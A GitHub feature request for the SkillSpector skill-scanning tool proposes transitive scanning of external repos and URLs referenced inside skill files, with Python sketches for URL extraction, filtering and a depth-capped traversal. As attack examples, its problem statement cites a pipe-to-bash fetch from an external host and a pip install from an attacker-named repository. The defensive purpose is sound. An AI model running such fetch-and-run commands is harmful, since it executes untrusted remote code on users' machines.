feat: transitive link scanning — follow external repos/URLs referenced inside skill files #97

@AbhiramDwivedi

Problem

SkillSpector currently resolves the top-level input once (resolve_input.py) and then scans only the local files that resolution produces. URLs and repository references found inside those files are never followed, so analysis stops at the boundary of the input skill.

This creates a blind spot for a realistic attack pattern: a skill that appears clean on its own but delegates execution to an external source at runtime.

Example vectors:

  • A shell script in the skill bundle that does curl https://external-host/setup.sh | bash — the URL is detected as a pattern, but if setup.sh itself contains the malicious payload, it is never scanned.
  • A SKILL.md that references a companion repo (pip install git+https://github.com/attacker/lib) — the companion repo's code is never analyzed.
  • A skill that looks benign today but links to a repo the attacker controls and can update later (rug-pull via a dependency, not the skill itself).

The OSV.dev queries (osv_client.py) partially address this for named packages, but not for arbitrary Git URLs or raw script fetches.

Proposed feature

Add transitive link scanning as an optional pass after the primary scan:

  1. Extract candidate URLs from the scan results — collect all external URLs surfaced by existing analyzers (supply-chain, data-exfiltration, taint-tracking findings already contain them) plus a lightweight pass over file_cache for https?:// references in Markdown links, curl/wget args, pip install git+, npm install, etc.

  2. Filter to scannable targets — only follow links that point to something SkillSpector already knows how to resolve: Git repo URLs, .zip archives, raw .md/.sh/.py file URLs. Skip documentation, issue trackers, badges, etc.

  3. Recursive resolve_input with a visited set — clone/fetch each candidate into a temp dir, run the full analyzer graph on it, and merge findings back into the parent report with a transitive_depth field on each finding so the output clearly distinguishes direct vs. transitive results.

  4. Depth + domain allow/deny list controls — cap recursion depth (e.g. --transitive-depth 1 default, --transitive-depth 2 opt-in) and let users configure trusted domains to skip (e.g. github.com/myorg/*).

  5. CLI flag — opt-in via --transitive (off by default to preserve current behavior and scan time).
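Steps 1 and 2 could be sketched roughly as follows. This is a minimal illustration, not SkillSpector code: the names extract_urls and is_scannable, the regex, the suffix list, and the host and path-segment sets are all assumptions made for the example, and a real pass would likely need more cases (npm install specifiers, for instance).

```python
import re
from urllib.parse import urlparse

# Hypothetical pattern: http(s) URLs, optionally prefixed with pip's "git+".
URL_RE = re.compile(r"(?:git\+)?https?://[^\s\"'<>)\]]+")
# Assumption: file types the resolver can already handle.
SCANNABLE_SUFFIXES = (".zip", ".md", ".sh", ".py", ".git")
# Assumption: hosts where a bare owner/repo path means a Git repository.
GIT_HOSTS = {"github.com", "gitlab.com"}
# Assumption: path segments that indicate non-code pages.
SKIP_SEGMENTS = {"issues", "pull", "wiki", "discussions"}


def extract_urls(text: str) -> list[str]:
    """Return unique URLs in order of first appearance."""
    seen: dict[str, None] = {}
    for match in URL_RE.finditer(text):
        # Drop sentence punctuation that the regex may have swallowed.
        url = match.group(0).rstrip(".,;:")
        seen.setdefault(url, None)
    return list(seen)


def is_scannable(url: str) -> bool:
    """Heuristic filter: keep repo URLs, archives and raw script/Markdown files."""
    if url.startswith("git+"):
        return True
    parsed = urlparse(url)
    path = parsed.path.rstrip("/")
    segments = [s for s in path.split("/") if s]
    if SKIP_SEGMENTS.intersection(segments):
        return False
    if path.lower().endswith(SCANNABLE_SUFFIXES):
        return True
    # A bare owner/repo path on a known Git host is treated as a repository.
    return parsed.hostname in GIT_HOSTS and len(segments) == 2
```

Keeping extraction and filtering as separate functions would let the filter be unit-tested against badge, issue-tracker, and documentation URLs without needing any file content.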

Why it fits the existing architecture

  • resolve_input.py already handles Git URLs, zips, raw file URLs, and directories — transitive scanning reuses that exact logic.
  • The analyzer registry is already a pure fan-out; running it on a second skill path requires no graph changes.
  • Findings from transitive targets can be added to the same findings list with a source_url / transitive_depth annotation, so meta_analyzer and report nodes are unaffected.
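As a rough illustration of the annotation idea in the last bullet, the sketch below tags findings from a transitive target before appending them to the parent list. The Finding dataclass is a hypothetical stand-in (SkillSpector's actual finding type is not shown in this issue), and merge_transitive is an invented helper name; only the source_url and transitive_depth field names come from the proposal.

```python
from dataclasses import dataclass, replace
from typing import Optional


@dataclass(frozen=True)
class Finding:
    # Hypothetical stand-in for SkillSpector's finding type.
    rule_id: str
    message: str
    source_url: Optional[str] = None  # None means the finding is direct
    transitive_depth: int = 0         # 0 means the top-level skill


def merge_transitive(
    parent: list[Finding],
    child: list[Finding],
    source_url: str,
    depth: int,
) -> list[Finding]:
    """Return parent findings followed by child findings tagged with their origin."""
    tagged = [
        replace(f, source_url=source_url, transitive_depth=depth) for f in child
    ]
    return parent + tagged
```

Because direct findings keep transitive_depth 0 and no source_url, downstream consumers that ignore the two extra fields would see the same list shape as before.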

Acceptance criteria

  • skillspector scan <skill> --transitive clones/fetches external repo/file links found in the skill and runs the full analyzer suite on each
  • Findings from transitive targets are clearly labeled in all output formats (JSON; SARIF, via a ruleId prefix or properties; Markdown, as a separate section)
  • A visited-URL set prevents infinite loops / circular references
  • Default behavior (no --transitive) is unchanged
  • Unit tests cover URL extraction, the visited-set loop guard, and depth capping
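The loop-guard and depth-cap criteria could be exercised against a traversal shaped roughly like the sketch below. It is an assumption-laden illustration: walk_transitive, normalize, and the links_of callback are hypothetical names, and links_of stands in for "fetch the target, scan it, and return the URLs found inside", which in SkillSpector would go through resolve_input and the analyzers.

```python
from collections import deque
from fnmatch import fnmatchcase
from typing import Callable, Iterable


def normalize(url: str) -> str:
    """Drop the scheme (including any git+ prefix), a trailing slash and a
    trailing .git so trivially different spellings compare equal."""
    return url.split("://", 1)[-1].rstrip("/").removesuffix(".git")


def walk_transitive(
    seeds: Iterable[str],
    links_of: Callable[[str], Iterable[str]],
    max_depth: int = 1,
    trusted: Iterable[str] = (),
) -> list[tuple[str, int]]:
    """Breadth-first walk returning (url, depth) for every target to scan."""
    trusted = tuple(trusted)
    visited: set[str] = set()
    order: list[tuple[str, int]] = []
    queue = deque((url, 1) for url in seeds)
    while queue:
        url, depth = queue.popleft()
        key = normalize(url)
        if depth > max_depth or key in visited:
            continue  # depth cap or loop guard
        visited.add(key)
        if any(fnmatchcase(key, pattern) for pattern in trusted):
            continue  # trusted target: neither scanned nor followed
        order.append((url, depth))
        if depth < max_depth:
            queue.extend((child, depth + 1) for child in links_of(url))
    return order
```

Passing links_of as a callback means the visited-set and depth logic can be tested with an in-memory graph, including a deliberate cycle, without any network access.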
